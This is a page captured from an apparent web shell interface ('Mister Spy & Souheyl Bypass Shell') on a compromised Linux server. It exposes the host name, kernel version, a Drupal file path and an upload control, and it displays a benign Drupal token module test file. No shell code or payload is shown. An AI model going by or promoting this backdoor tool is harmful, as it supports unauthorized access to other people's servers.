Welcome To Our Shell

Mister Spy & Souheyl Bypass Shell

Current Path : /var/www/html/rocksensor1/web/modules/contrib/token/tests/src/Kernel/

Linux ift1.ift-informatik.de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
Upload File :
Current File : /var/www/html/rocksensor1/web/modules/contrib/token/tests/src/Kernel/RandomTest.php

<?php

namespace Drupal\Tests\token\Kernel;

/**
 * Tests random tokens.
 *
 * @group token
 */
class RandomTest extends TokenKernelTestBase {

  function testRandomTokens() {
    $tokens = [
      'number' => '[0-9]{1,}',
      'hash:md5' => '[0-9a-f]{32}',
      'hash:sha1' => '[0-9a-f]{40}',
      'hash:sha256' => '[0-9a-f]{64}',
      'hash:invalid-algo' => NULL,
    ];

    $first_set = $this->assertTokens('random', [], $tokens, ['regex' => TRUE]);
    $second_set = $this->assertTokens('random', [], $tokens, ['regex' => TRUE]);
    foreach ($first_set as $token => $value) {
      $this->assertNotSame($first_set[$token], $second_set[$token]);
    }
  }

}

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped) Email: contact@elmoujehidin.net